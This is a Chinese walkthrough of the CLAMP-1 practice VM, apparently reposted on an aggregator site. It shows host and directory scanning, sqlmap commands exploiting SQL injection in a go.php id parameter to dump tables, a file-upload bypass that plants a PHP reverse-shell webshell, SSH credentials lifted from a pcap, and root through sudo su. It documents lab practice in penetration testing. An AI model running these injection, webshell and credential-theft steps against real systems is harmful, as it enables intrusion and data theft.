当前位置: 首页 > news >正文

CLAMP-1

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.173 -p- -A

3、目录扫描

dirb http://192.168.236.173

二、漏洞探测

访问80端口

访问 /nt4stopc/

下面有一些问题,提示必须收集答案

都是一些判断题,对与错对应1与0,最后结果为

0110111001

拼接访问

点击图中位置,发现url中存在参数,可能存在注入

直接用sqlmap跑一下

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch

库名

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

tatil 库下的表名

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil --tables

gereksiz 表下得到一串值

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil -T gereksiz --dumphihijrijrijr-balrgralrijr-htjrzhujrz-bfnf  folder upload.php

解码

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

可能是路径,拼接访问

再拼接 /upload.php

文件上传,以md5提交,但是没有提交按钮,自己在前端加一个

<input type="submit">

三、GetShell

kali 反弹shell

locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php

上传该文件后,返回了文件路径,文件名为md5加密后的

osas/2ad6bded962b884337eaeb921d7c2764.php

浏览器访问,kali 成功反弹到shell

http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

四、提权

使用python提高交互性

python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下发现 important.pcapng

查看文件内容,发现

email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work

url解码,得到以下数据

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

账号密码

mkelepce:mklpc-osas112.

ssh连接

ssh mkelepce@192.168.236.173

查看具有root权限的命令

sudo -l

显示为 all ,直接 sudo su 提权,提权成功

sudo su

查看flag

http://www.lryc.cn/news/420611.html

相关文章:

  • Blender的Python编程介绍
  • 树莓派4/5:运行Yolov5n模型(文末附镜像文件)
  • 【学习笔记】Day 9
  • Linux网络案例
  • 苹果离线打包机配置和打包
  • 【C++ Primer Plus】学习笔记 5【指针 下】
  • Phpstorm实现本地SSH开发远程机器(或虚拟机)项目
  • API 的多分支管理,让 Apifox 帮你轻松搞定!
  • 线上预约陪诊平台医院陪诊系统源码就医陪护小程序APP开发
  • 240806-在Linux/RHEL开机中自动启动bash脚本
  • 【多线程】乐观/悲观锁、重量级/轻量级锁、挂起等待/自旋锁、公平/非公锁、可重入/不可重入锁、读写锁
  • 31_逻辑漏洞、水平垂直越权、垂直越权漏洞测试、水平越权
  • css写一个按钮流光动画效果
  • AxMath保姆级安装教程(word联用)及使用TIPS
  • Vue-03.指令-v-on
  • 接口基础知识6:详解http request body(一篇讲完常见请求体)
  • Windows Server 安装Web,DHCP,DNS,FTP四大服务及其配置和监控方式
  • 创意指南丨VR游览沉浸式空间体验
  • 【iOS】—— autoreleasePool以及总结
  • 培训第二十五天(python中执行mysql操作并将python脚本共享)
  • LVS实战项目
  • 笔记小结:《利用python进行数据分析》之层次化索引
  • Linux的线程篇章 - 线程池、进程池等知识】
  • 汇昌联信做拼多多运营正规吗?
  • 240810-Gradio自定义Button按钮+事件函数+按钮图标样式设定
  • 排序算法--快速排序
  • springMVC -- 学习笔记
  • 修复本地终端(windows)连接服务器使用zsh出现乱跳的问题
  • 【扒代码】regression_head.py
  • vue2 使用axios 请求后台返回文件流导出为excel